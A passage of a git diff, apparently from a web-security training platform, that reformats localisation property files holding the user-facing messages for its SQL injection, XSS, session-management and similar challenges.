-insecureCryptoStorage.4.orderShipped=Your order has been made and has been sent to our magic shipping department that knows where you want this to be delivered via brain wave sniffing techniques.
-insecureCryptoStorage.4.totalCost=Your order comes to a total of
-insecureCryptoStorage.4.freeOranges=Oranges were free, Well Done
-insecureCryptoStorage.4.orderFailed=Order Failed - Please try again later
-insecureCryptoStorage.homemade.badanswer=Incorrect Answer Submitted
-insecureCryptoStorage.homemade.badanswer.warning=That is not your user specific solution for 'This Challenge'. Please ensure you have discovered the correct key and can reproduce the above solutions before trying again.
-insecureCryptoStorage.homemade.badanswer.notLockedOut=You will get locked out from submissions if you continue to submit incorrect answers.
-insecureCryptoStorage.homemade.badanswer.lockedOut=You can no longer submit solutions.
-insecureCryptoStorage.homemade.nameTooShort=Name is too short
-result.wellDone=Well Done 
-result.youDidIt=You successfully completed the challenge!
-result.resultKey=The result key for this challenge is
-result.failed=Something funky happened! Please try again!
\ No newline at end of file
+insecureCryptoStorage.3.plaintextResult = Plain text Result:
+insecureCryptoStorage.3.plaintextResult.message = Your cipher text was decrypted to the following:
+
+insecureCryptoStorage.4.orderComplete = Order Complete
+insecureCryptoStorage.4.orderShipped = Your order has been made and has been sent to our magic shipping department that knows where you want this to be delivered via brain wave sniffing techniques.
+insecureCryptoStorage.4.totalCost = Your order comes to a total of
+insecureCryptoStorage.4.freeOranges = Oranges were free, Well Done
+insecureCryptoStorage.4.orderFailed = Order Failed - Please try again later
+
+insecureCryptoStorage.homemade.badanswer = Incorrect Answer Submitted
+insecureCryptoStorage.homemade.badanswer.warning = That is not your user specific solution for 'This Challenge'. Please ensure you have discovered the correct key and can reproduce the above solutions before trying again.
+insecureCryptoStorage.homemade.badanswer.notLockedOut = You will get locked out from submissions if you continue to submit incorrect answers.
+insecureCryptoStorage.homemade.badanswer.lockedOut = You can no longer submit solutions.
+insecureCryptoStorage.homemade.nameTooShort = Name is too short
+
+result.wellDone = Well Done 
+result.youDidIt = You successfully completed the challenge!
+result.resultKey = The result key for this challenge is
+result.failed = Something funky happened! Please try again!
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/poorValidation/poorValidationStrings.properties b/src/main/resources/i18n/servlets/challenges/poorValidation/poorValidationStrings.properties
index dc210ebd3..ef522492f 100644
--- a/src/main/resources/i18n/servlets/challenges/poorValidation/poorValidationStrings.properties
+++ b/src/main/resources/i18n/servlets/challenges/poorValidation/poorValidationStrings.properties
@@ -1,5 +1,5 @@
-poorValidation.orderComplete=Order Complete
-poorValidation.orderComplete.message=Your order has been made and has been sent to our magic shipping department that knows where you want this to be delivered via brain wave sniffing techniques.
-poorValidation.orderTotal=Your order comes to a total of
-poorValidation.freeOranges=Oranges were free, Well Done
-poorValidation.badOrder=Order Failed - Please try again later
\ No newline at end of file
+poorValidation.orderComplete = Order Complete
+poorValidation.orderComplete.message = Your order has been made and has been sent to our magic shipping department that knows where you want this to be delivered via brain wave sniffing techniques.
+poorValidation.orderTotal = Your order comes to a total of
+poorValidation.freeOranges = Oranges were free, Well Done
+poorValidation.badOrder = Order Failed - Please try again later
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/securityMisconfig/stealTokens.properties b/src/main/resources/i18n/servlets/challenges/securityMisconfig/stealTokens.properties
index d09ed4af3..742799d70 100644
--- a/src/main/resources/i18n/servlets/challenges/securityMisconfig/stealTokens.properties
+++ b/src/main/resources/i18n/servlets/challenges/securityMisconfig/stealTokens.properties
@@ -1,5 +1,5 @@
-securityMisconfig.servlet.stealTokens.notComplete=Challenge NOT Complete
-securityMisconfig.servlet.stealTokens.notComplete.message=You cannot complete this securityMisconfig.servlet.stealTokens with your cookie value. You must get the cookie from another user.
-securityMisconfig.servlet.stealTokens.notComplete.yourToken=You muse submit a valid token of another user to complete this securityMisconfig.servlet.stealTokens.
-securityMisconfig.servlet.stealTokens.complete=Challenge Complete
-securityMisconfig.servlet.stealTokens.youDidIt=Congratulations! Your result key is as follows
\ No newline at end of file
+securityMisconfig.servlet.stealTokens.notComplete = Challenge NOT Complete
+securityMisconfig.servlet.stealTokens.notComplete.message = You cannot complete this securityMisconfig.servlet.stealTokens with your cookie value. You must get the cookie from another user.
+securityMisconfig.servlet.stealTokens.notComplete.yourToken = You muse submit a valid token of another user to complete this securityMisconfig.servlet.stealTokens.
+securityMisconfig.servlet.stealTokens.complete = Challenge Complete
+securityMisconfig.servlet.stealTokens.youDidIt = Congratulations! Your result key is as follows
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement1.properties b/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement1.properties
index ddaab89e6..a96f4ab9e 100644
--- a/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement1.properties
+++ b/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement1.properties
@@ -1,6 +1,6 @@
-response.adminClub=Admin Only Club
-response.welcomeAdmin=Welcome administrator. Your result key is as follows
-response.notAdmin=You're not an Admin!!!
-response.notAdminMessage=Stay away from the admin only section. The dogs have been released. 
-response.hackDetected=HACK DETECTED
-response.hackDetectedMessage=A possible attack has been detected. Functionality Stopped before any damage was done
\ No newline at end of file
+response.adminClub = Admin Only Club
+response.welcomeAdmin = Welcome administrator. Your result key is as follows
+response.notAdmin = You're not an Admin!!!
+response.notAdminMessage = Stay away from the admin only section. The dogs have been released. 
+response.hackDetected = HACK DETECTED
+response.hackDetectedMessage = A possible attack has been detected. Functionality Stopped before any damage was done
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement2.properties b/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement2.properties
index 15ef46f25..25c5e71cb 100644
--- a/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement2.properties
+++ b/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement2.properties
@@ -1,8 +1,9 @@
-response.welcome=Welcome
-response.resultKey=The result key is
-response.badPass=Incorrect password for
-response.badUser=User name not found.
-response.changedTo=Changed To:
-form.userName=Username:
-form.password=Password:
-form.signIn=Sign In
\ No newline at end of file
+response.welcome = Welcome
+response.resultKey = The result key is
+response.badPass = Incorrect password for
+response.badUser = User name not found.
+response.changedTo = Changed To:
+
+form.userName = Username:
+form.password = Password:
+form.signIn = Sign In
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement3.properties b/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement3.properties
index fbac92d44..3bd734bcb 100644
--- a/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement3.properties
+++ b/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement3.properties
@@ -1,11 +1,13 @@
-response.welcome=Welcome
-response.resultKey=The result key is
-response.badPass=Incorrect password for
-response.badUser=User name not found.
-response.welcomeGuest=Welcome Guest
-response.guestMessage=No further information for Guest Users currently available. If your getting bored of the current functions available, you'll just have to upgrade yourself to an administrator somehow.
-form.userName=Username:
-form.password=Password:
-form.signIn=Sign In
-reset.password=Password change request success.
-reset.failed=Change Password Failed.
\ No newline at end of file
+response.welcome = Welcome
+response.resultKey = The result key is
+response.badPass = Incorrect password for
+response.badUser = User name not found.
+response.welcomeGuest = Welcome Guest
+response.guestMessage = No further information for Guest Users currently available. If your getting bored of the current functions available, you'll just have to upgrade yourself to an administrator somehow.
+
+form.userName = Username:
+form.password = Password:
+form.signIn = Sign In
+
+reset.password = Password change request success.
+reset.failed = Change Password Failed.
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement4.properties b/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement4.properties
index 6948cda18..133963d24 100644
--- a/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement4.properties
+++ b/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement4.properties
@@ -1,6 +1,6 @@
-response.adminClub=Admin Only Club
-response.welcomeAdmin=Welcome administrator. Your result key is as follows
-response.notAdmin=You're not an Admin!!!
-response.notAdminMessage=Stay away from the admin only section. The wolves have been released. 
-response.hackDetected=HACK DETECTED
-response.hackDetectedMessage=A possible attack has been detected. Functionality Stopped before any damage was done
\ No newline at end of file
+response.adminClub = Admin Only Club
+response.welcomeAdmin = Welcome administrator. Your result key is as follows
+response.notAdmin = You're not an Admin!!!
+response.notAdminMessage = Stay away from the admin only section. The wolves have been released. 
+response.hackDetected = HACK DETECTED
+response.hackDetectedMessage = A possible attack has been detected. Functionality Stopped before any damage was done
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement5.properties b/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement5.properties
index b126c407f..9e690ddca 100644
--- a/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement5.properties
+++ b/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement5.properties
@@ -1,18 +1,21 @@
-response.welcome=Welcome
-response.resultKey=The result key is
-response.badPass=Incorrect password for
-response.badUser=User name not found.
-response.welcomeGuest=Welcome Guest
-response.guestMessage=No further information for Guest Users currently available. If your getting bored of the current functions available, you'll just have to upgrade yourself to an administrator somehow.
-form.userName=Username:
-form.password=Password:
-form.signIn=Sign In
-changePass.noDecode=Could not Decode Token
-changePass.badTokenData=Could not parse/manipulate date or time from token
-changePass.success=Password change request success.
-changePass.failure=Change Password Failed. Must be at least 12 characters.
-changePass.oldToken=Token is too old or none was submitted. Please get another one
-changePass.youngToken=Token is too young. Please get another and try again.
-changePass.funkyToken=Token is invalid (Too Funky). Please get another and try again.
-setToken.sentTo.1=URL with embedded password reset token has been sent to
-setToken.sentTo.2=via email.
\ No newline at end of file
+response.welcome = Welcome
+response.resultKey = The result key is
+response.badPass = Incorrect password for
+response.badUser = User name not found.
+response.welcomeGuest = Welcome Guest
+response.guestMessage = No further information for Guest Users currently available. If your getting bored of the current functions available, you'll just have to upgrade yourself to an administrator somehow.
+
+form.userName = Username:
+form.password = Password:
+form.signIn = Sign In
+
+changePass.noDecode = Could not Decode Token
+changePass.badTokenData = Could not parse/manipulate date or time from token
+changePass.success = Password change request success.
+changePass.failure = Change Password Failed. Must be at least 12 characters.
+changePass.oldToken = Token is too old or none was submitted. Please get another one
+changePass.youngToken = Token is too young. Please get another and try again.
+changePass.funkyToken = Token is invalid (Too Funky). Please get another and try again.
+
+setToken.sentTo.1 = URL with embedded password reset token has been sent to
+setToken.sentTo.2 = via email.
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement6.properties b/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement6.properties
index 0ced95e81..880198e83 100644
--- a/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement6.properties
+++ b/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement6.properties
@@ -1,14 +1,16 @@
-response.welcome=Welcome
-response.resultKey=The result key is
-response.badPass=Incorrect password for
-response.badUser=User name not found.
-response.configError=500: INVALID ANSWER CONTROL CONFIGURATION SET
-form.userName=Username:
-form.password=Password:
-form.signIn=Sign In
-question.badAnswer=Incorrect Answer
-question.whoAreYou=Are you sure you are who you say you are?
-question.invalidAns=Invalid Answer
-question.invalidEmail=Invalid Email Address
-question.invalidData=Invalid Data Submitted
-question.noQuestion=No question found for that user
\ No newline at end of file
+response.welcome = Welcome
+response.resultKey = The result key is
+response.badPass = Incorrect password for
+response.badUser = User name not found.
+response.configError = 500: INVALID ANSWER CONTROL CONFIGURATION SET
+
+form.userName = Username:
+form.password = Password:
+form.signIn = Sign In
+
+question.badAnswer = Incorrect Answer
+question.whoAreYou = Are you sure you are who you say you are?
+question.invalidAns = Invalid Answer
+question.invalidEmail = Invalid Email Address
+question.invalidData = Invalid Data Submitted
+question.noQuestion = No question found for that user
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement7.properties b/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement7.properties
index 08cb290c1..c53d27574 100644
--- a/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement7.properties
+++ b/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement7.properties
@@ -1,13 +1,15 @@
-response.welcome=Welcome
-response.resultKey=The result key is
-response.badPass=Incorrect password for
-response.badUser=User name not found.
-response.configError=500: INVALID ANSWER CONTROL CONFIGURATION SET
-form.userName=Username:
-form.password=Password:
-form.signIn=Sign In
-question.badAnswer=Incorrect Answer
-question.whoAreYou=Are you sure you are who you say you are?
-question.invalidAns=Invalid Answer
-question.invalidEmail=Invalid Email Address
-question.invalidData=Invalid Data Submitted
\ No newline at end of file
+response.welcome = Welcome
+response.resultKey = The result key is
+response.badPass = Incorrect password for
+response.badUser = User name not found.
+response.configError = 500: INVALID ANSWER CONTROL CONFIGURATION SET
+
+form.userName = Username:
+form.password = Password:
+form.signIn = Sign In
+
+question.badAnswer = Incorrect Answer
+question.whoAreYou = Are you sure you are who you say you are?
+question.invalidAns = Invalid Answer
+question.invalidEmail = Invalid Email Address
+question.invalidData = Invalid Data Submitted
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement8.properties b/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement8.properties
index c3f8eb4f3..3682643dc 100644
--- a/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement8.properties
+++ b/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement8.properties
@@ -1,7 +1,7 @@
-response.superUserClub=Super User Only Club
-response.welcomeSuperUser=Welcome super user! Your result key is as follows
-response.invalidRole=Invalid Role Detected
-response.notPrivileged=You're not a privileged User!!! 
-response.notPrivileged.message=Stay away from the privileged only section. The super aggressive dogs have been released.
-response.hackDetected=HACK DETECTED
-response.hackDetected.message=A possible attack has been detected. Functionality Stopped before any damage was done
\ No newline at end of file
+response.superUserClub = Super User Only Club
+response.welcomeSuperUser = Welcome super user! Your result key is as follows
+response.invalidRole = Invalid Role Detected
+response.notPrivileged = You're not a privileged User!!! 
+response.notPrivileged.message = Stay away from the privileged only section. The super aggressive dogs have been released.
+response.hackDetected = HACK DETECTED
+response.hackDetected.message = A possible attack has been detected. Functionality Stopped before any damage was done
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/sqli/sqli1.properties b/src/main/resources/i18n/servlets/challenges/sqli/sqli1.properties
index 46599423c..95677a0fe 100644
--- a/src/main/resources/i18n/servlets/challenges/sqli/sqli1.properties
+++ b/src/main/resources/i18n/servlets/challenges/sqli/sqli1.properties
@@ -1,5 +1,5 @@
-response.searchResults=Search Results
-response.table.name=Name
-response.table.address=Address
-response.table.comment=Comment
-response.noResults=There were no results found in your search
+response.searchResults = Search Results
+response.table.name = Name
+response.table.address = Address
+response.table.comment = Comment
+response.noResults = There were no results found in your search
diff --git a/src/main/resources/i18n/servlets/challenges/sqli/sqli3.properties b/src/main/resources/i18n/servlets/challenges/sqli/sqli3.properties
index 17abf685d..a41688550 100644
--- a/src/main/resources/i18n/servlets/challenges/sqli/sqli3.properties
+++ b/src/main/resources/i18n/servlets/challenges/sqli/sqli3.properties
@@ -1,3 +1,3 @@
-response.searchResults=Search Results
-response.table.name=Name
-response.noResults=There were no results found in your search
\ No newline at end of file
+response.searchResults = Search Results
+response.table.name = Name
+response.noResults = There were no results found in your search
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/sqli/sqli4.properties b/src/main/resources/i18n/servlets/challenges/sqli/sqli4.properties
index 93962169e..b617f7cb2 100644
--- a/src/main/resources/i18n/servlets/challenges/sqli/sqli4.properties
+++ b/src/main/resources/i18n/servlets/challenges/sqli/sqli4.properties
@@ -1,5 +1,5 @@
-response.loginResults=Login Result
-response.signedInAs=Signed in as 
-response.adminResultKey=As you are the admin, here is the result key:
-response.adminsFun=But admins have all the fun
-response.superSecure=You didn't log in. This site is super secure so hax won't work!
\ No newline at end of file
+response.loginResults = Login Result
+response.signedInAs = Signed in as 
+response.adminResultKey = As you are the admin, here is the result key:
+response.adminsFun = But admins have all the fun
+response.superSecure = You didn't log in. This site is super secure so hax won't work!
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/sqli/sqli5.properties b/src/main/resources/i18n/servlets/challenges/sqli/sqli5.properties
index 69687059d..0d1f91c6e 100644
--- a/src/main/resources/i18n/servlets/challenges/sqli/sqli5.properties
+++ b/src/main/resources/i18n/servlets/challenges/sqli/sqli5.properties
@@ -1,11 +1,11 @@
-response.orderComplete=Order Complete
-response.orderComplete.p1=Your order has been made and has been sent to our magic shipping department that knows where you want this to be delivered via brain wave sniffing techniques.
-response.orderComplete.p2=Your order comes to a total of 
-response.orangesFreeSolution=Oranges were free, Well Done - 
-response.orderFailed=Order Failed - Please try again later
-response.invalidAmount=Order Failed - It's over 9000! There's no way that can be right.
-response.percent=%
-response.off=off
-response.items=items
-response.noCoupon=No Coupon Found
-response.checkFailed=Check Failed - Please try again later
\ No newline at end of file
+response.orderComplete = Order Complete
+response.orderComplete.p1 = Your order has been made and has been sent to our magic shipping department that knows where you want this to be delivered via brain wave sniffing techniques.
+response.orderComplete.p2 = Your order comes to a total of 
+response.orangesFreeSolution = Oranges were free, Well Done - 
+response.orderFailed = Order Failed - Please try again later
+response.invalidAmount = Order Failed - It's over 9000! There's no way that can be right.
+response.percent = %
+response.off = off
+response.items = items
+response.noCoupon = No Coupon Found
+response.checkFailed = Check Failed - Please try again later
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/sqli/sqli6.properties b/src/main/resources/i18n/servlets/challenges/sqli/sqli6.properties
index 07b43247c..02b33d747 100644
--- a/src/main/resources/i18n/servlets/challenges/sqli/sqli6.properties
+++ b/src/main/resources/i18n/servlets/challenges/sqli/sqli6.properties
@@ -1,5 +1,5 @@
-response.welcomeBack=Welcome back 
-response.authNumber=Your authentication number is now 
-response.incorrectCreds=Incorrect Pin Number
-response.carefulNow=Careful now!
-response.badRequest=Bad Request? Please be careful!
\ No newline at end of file
+response.welcomeBack = Welcome back 
+response.authNumber = Your authentication number is now 
+response.incorrectCreds = Incorrect Pin Number
+response.carefulNow = Careful now!
+response.badRequest = Bad Request? Please be careful!
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/sqli/sqli7.properties b/src/main/resources/i18n/servlets/challenges/sqli/sqli7.properties
index 80ab6ccf7..95c9355ac 100644
--- a/src/main/resources/i18n/servlets/challenges/sqli/sqli7.properties
+++ b/src/main/resources/i18n/servlets/challenges/sqli/sqli7.properties
@@ -1,6 +1,6 @@
-response.welcome=Welcome 
-response.resultKey=The result key for this level is 
-response.incorrectCreds=Incorrect Password / User name
-response.carefulNow=Careful now!
-response.badEmail=Bad Email address detected.
-response.badRequest=Bad Request? Please be careful!
\ No newline at end of file
+response.welcome = Welcome 
+response.resultKey = The result key for this level is 
+response.incorrectCreds = Incorrect Password / User name
+response.carefulNow = Careful now!
+response.badEmail =  Bad Email address detected.
+response.badRequest = Bad Request? Please be careful!
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/sqli/sqliEmail.properties b/src/main/resources/i18n/servlets/challenges/sqli/sqliEmail.properties
index cc0f17a09..4f981c47b 100644
--- a/src/main/resources/i18n/servlets/challenges/sqli/sqliEmail.properties
+++ b/src/main/resources/i18n/servlets/challenges/sqli/sqliEmail.properties
@@ -1,7 +1,7 @@
-response.searchResults=Search Results
-response.table.name=Name
-response.table.address=Address
-response.table.comment=Comment
-response.noResults=There were no results found in your search
-response.searchError=Search Error
-response.invalidEmail=Invalid Email Address was submitted
\ No newline at end of file
+response.searchResults = Search Results
+response.table.name = Name
+response.table.address = Address
+response.table.comment = Comment
+response.noResults = There were no results found in your search
+response.searchError = Search Error
+response.invalidEmail = Invalid Email Address was submitted
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/sqli/sqliEscaping.properties b/src/main/resources/i18n/servlets/challenges/sqli/sqliEscaping.properties
index 2a4f8f50f..d0a0dd5c6 100644
--- a/src/main/resources/i18n/servlets/challenges/sqli/sqliEscaping.properties
+++ b/src/main/resources/i18n/servlets/challenges/sqli/sqliEscaping.properties
@@ -1,5 +1,5 @@
-response.searchResults=Search Results
-response.table.name=Name
-response.table.address=Address
-response.table.comment=Comment
-response.noResults=There were no results found in your search
\ No newline at end of file
+response.searchResults = Search Results
+response.table.name = Name
+response.table.address = Address
+response.table.comment = Comment
+response.noResults = There were no results found in your search
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/sqli/sqliStoreProcedure.properties b/src/main/resources/i18n/servlets/challenges/sqli/sqliStoreProcedure.properties
index 2a4f8f50f..d0a0dd5c6 100644
--- a/src/main/resources/i18n/servlets/challenges/sqli/sqliStoreProcedure.properties
+++ b/src/main/resources/i18n/servlets/challenges/sqli/sqliStoreProcedure.properties
@@ -1,5 +1,5 @@
-response.searchResults=Search Results
-response.table.name=Name
-response.table.address=Address
-response.table.comment=Comment
-response.noResults=There were no results found in your search
\ No newline at end of file
+response.searchResults = Search Results
+response.table.name = Name
+response.table.address = Address
+response.table.comment = Comment
+response.noResults = There were no results found in your search
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/urlAccess/urlAccess1.properties b/src/main/resources/i18n/servlets/challenges/urlAccess/urlAccess1.properties
index 7b2f9e6e6..bc05e3464 100644
--- a/src/main/resources/i18n/servlets/challenges/urlAccess/urlAccess1.properties
+++ b/src/main/resources/i18n/servlets/challenges/urlAccess/urlAccess1.properties
@@ -1,6 +1,6 @@
-response.status=Server Status
-response.status.message=The server status is normal. Nothing to see here. Move along.
-response.statusFail=Server Status Failure
-response.statusFail.message=Could not retrieve server status. Invalid userData.
-result.keyMessage.1=We have no idea what is wrong with the server. It just keeps saying "Result key is;
-result.keyMessage.2=What does that even mean?!
\ No newline at end of file
+response.status = Server Status
+response.status.message = The server status is normal. Nothing to see here. Move along.
+response.statusFail = Server Status Failure
+response.statusFail.message = Could not retrieve server status. Invalid userData.
+result.keyMessage.1 = We have no idea what is wrong with the server. It just keeps saying "Result key is;
+result.keyMessage.2 = What does that even mean?!
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/urlAccess/urlAccess2.properties b/src/main/resources/i18n/servlets/challenges/urlAccess/urlAccess2.properties
index dd1c22f88..035dcf2a2 100644
--- a/src/main/resources/i18n/servlets/challenges/urlAccess/urlAccess2.properties
+++ b/src/main/resources/i18n/servlets/challenges/urlAccess/urlAccess2.properties
@@ -1,9 +1,12 @@
-admin.clicked=Admin Button Clicked
-admin.keyMessage.1=Hey Admin, Here is that key you are looking for: 
-admin.keyMessage.2=Enjoy!
-message.boring=Pretty Boring Stuff.
-message.different=This is different.
-request.normal=Normal Guest Request
-request.notNormal=Not Normal Guest Request
-response.failure=Server Status Failure
-response.failue.message=Could not retrieve server status. Invalid userData.
\ No newline at end of file
+admin.clicked = Admin Button Clicked
+admin.keyMessage.1 = Hey Admin, Here is that key you are looking for: 
+admin.keyMessage.2 = Enjoy!
+
+message.boring = Pretty Boring Stuff.
+message.different = This is different.
+
+request.normal = Normal Guest Request
+request.notNormal = Not Normal Guest Request
+
+response.failure = Server Status Failure
+response.failue.message = Could not retrieve server status. Invalid userData.
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/urlAccess/urlAccess3.properties b/src/main/resources/i18n/servlets/challenges/urlAccess/urlAccess3.properties
index 1694c61ce..2f4f1e2d2 100644
--- a/src/main/resources/i18n/servlets/challenges/urlAccess/urlAccess3.properties
+++ b/src/main/resources/i18n/servlets/challenges/urlAccess/urlAccess3.properties
@@ -1,9 +1,10 @@
-admin.superAdminClub=Super User Only Club
-admin.superAdminClub.keyMessage=Welcome super admin! Your result key is as follows
-response.invalidUser=Invalid User Detected
-response.hackDetected=HACK DETECTED
-response.hackDetected.message=A possible attack has been detected. Functionality Stopped before any damage was done
-response.notSuperAdmin=You're not a Super Admin!!!
-response.notSuperAdmin.message=Stay away from the super admin only section. The mighty dog beasts have been released.
-response.whoAreYou=Who are you?
-response.whoAreYou.message=System could not process user identifier submitted. The admin list has been notified of the event
\ No newline at end of file
+admin.superAdminClub = Super User Only Club
+admin.superAdminClub.keyMessage = Welcome super admin! Your result key is as follows
+
+response.invalidUser = Invalid User Detected
+response.hackDetected = HACK DETECTED
+response.hackDetected.message = A possible attack has been detected. Functionality Stopped before any damage was done
+response.notSuperAdmin = You're not a Super Admin!!!
+response.notSuperAdmin.message = Stay away from the super admin only section. The mighty dog beasts have been released.
+response.whoAreYou = Who are you?
+response.whoAreYou.message = System could not process user identifier submitted. The admin list has been notified of the event
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/xss/xss1.properties b/src/main/resources/i18n/servlets/challenges/xss/xss1.properties
index 619425449..40a4ec581 100644
--- a/src/main/resources/i18n/servlets/challenges/xss/xss1.properties
+++ b/src/main/resources/i18n/servlets/challenges/xss/xss1.properties
@@ -1,5 +1,6 @@
-result.wellDone=Well Done 
-result.youDidIt=You successfully executed the JavaScript alert command!
-result.resultKey=The result key for this challenge is
-response.searchResults=Search Results
-response.noResults=Sorry but there were no results found that related to
\ No newline at end of file
+result.wellDone = Well Done 
+result.youDidIt = You successfully executed the JavaScript alert command!
+result.resultKey = The result key for this challenge is
+
+response.searchResults = Search Results
+response.noResults = Sorry but there were no results found that related to
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/xss/xss2.properties b/src/main/resources/i18n/servlets/challenges/xss/xss2.properties
index 619425449..40a4ec581 100644
--- a/src/main/resources/i18n/servlets/challenges/xss/xss2.properties
+++ b/src/main/resources/i18n/servlets/challenges/xss/xss2.properties
@@ -1,5 +1,6 @@
-result.wellDone=Well Done 
-result.youDidIt=You successfully executed the JavaScript alert command!
-result.resultKey=The result key for this challenge is
-response.searchResults=Search Results
-response.noResults=Sorry but there were no results found that related to
\ No newline at end of file
+result.wellDone = Well Done 
+result.youDidIt = You successfully executed the JavaScript alert command!
+result.resultKey = The result key for this challenge is
+
+response.searchResults = Search Results
+response.noResults = Sorry but there were no results found that related to
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/xss/xss3.properties b/src/main/resources/i18n/servlets/challenges/xss/xss3.properties
index 619425449..40a4ec581 100644
--- a/src/main/resources/i18n/servlets/challenges/xss/xss3.properties
+++ b/src/main/resources/i18n/servlets/challenges/xss/xss3.properties
@@ -1,5 +1,6 @@
-result.wellDone=Well Done 
-result.youDidIt=You successfully executed the JavaScript alert command!
-result.resultKey=The result key for this challenge is
-response.searchResults=Search Results
-response.noResults=Sorry but there were no results found that related to
\ No newline at end of file
+result.wellDone = Well Done 
+result.youDidIt = You successfully executed the JavaScript alert command!
+result.resultKey = The result key for this challenge is
+
+response.searchResults = Search Results
+response.noResults = Sorry but there were no results found that related to
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/xss/xss4.properties b/src/main/resources/i18n/servlets/challenges/xss/xss4.properties
index 8e8668b7d..012d31845 100644
--- a/src/main/resources/i18n/servlets/challenges/xss/xss4.properties
+++ b/src/main/resources/i18n/servlets/challenges/xss/xss4.properties
@@ -1,5 +1,6 @@
-result.wellDone=Well Done 
-result.youDidIt=You successfully executed the JavaScript alert command!
-result.resultKey=The result key for this challenge is
-response.yourPost=Your New Post!
-response.linkPosted=You just posted the following link;
\ No newline at end of file
+result.wellDone = Well Done 
+result.youDidIt = You successfully executed the JavaScript alert command!
+result.resultKey = The result key for this challenge is
+
+response.yourPost = Your New Post!
+response.linkPosted = You just posted the following link;
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/xss/xss5.properties b/src/main/resources/i18n/servlets/challenges/xss/xss5.properties
index 8e8668b7d..012d31845 100644
--- a/src/main/resources/i18n/servlets/challenges/xss/xss5.properties
+++ b/src/main/resources/i18n/servlets/challenges/xss/xss5.properties
@@ -1,5 +1,6 @@
-result.wellDone=Well Done 
-result.youDidIt=You successfully executed the JavaScript alert command!
-result.resultKey=The result key for this challenge is
-response.yourPost=Your New Post!
-response.linkPosted=You just posted the following link;
\ No newline at end of file
+result.wellDone = Well Done 
+result.youDidIt = You successfully executed the JavaScript alert command!
+result.resultKey = The result key for this challenge is
+
+response.yourPost = Your New Post!
+response.linkPosted = You just posted the following link;
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/xss/xss6.properties b/src/main/resources/i18n/servlets/challenges/xss/xss6.properties
index 8e8668b7d..012d31845 100644
--- a/src/main/resources/i18n/servlets/challenges/xss/xss6.properties
+++ b/src/main/resources/i18n/servlets/challenges/xss/xss6.properties
@@ -1,5 +1,6 @@
-result.wellDone=Well Done 
-result.youDidIt=You successfully executed the JavaScript alert command!
-result.resultKey=The result key for this challenge is
-response.yourPost=Your New Post!
-response.linkPosted=You just posted the following link;
\ No newline at end of file
+result.wellDone = Well Done 
+result.youDidIt = You successfully executed the JavaScript alert command!
+result.resultKey = The result key for this challenge is
+
+response.yourPost = Your New Post!
+response.linkPosted = You just posted the following link;
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/errors.properties b/src/main/resources/i18n/servlets/errors.properties
index 8ae887b30..1dd3a6b85 100644
--- a/src/main/resources/i18n/servlets/errors.properties
+++ b/src/main/resources/i18n/servlets/errors.properties
@@ -1,7 +1,7 @@
-error.funky=An Error Occurred! You must be getting funky!
-error.noSession=No session was detected with your request. Are you signed in?
-error.detected=An error was detected!
-error.shouldNotBeHere=You shouldn't be here!
-error.occured=Error Occurred: 
-error.notOpen=The Level is not open. Please ask the admin to open it before trying to continue. This is not \
+error.funky = An Error Occurred! You must be getting funky!
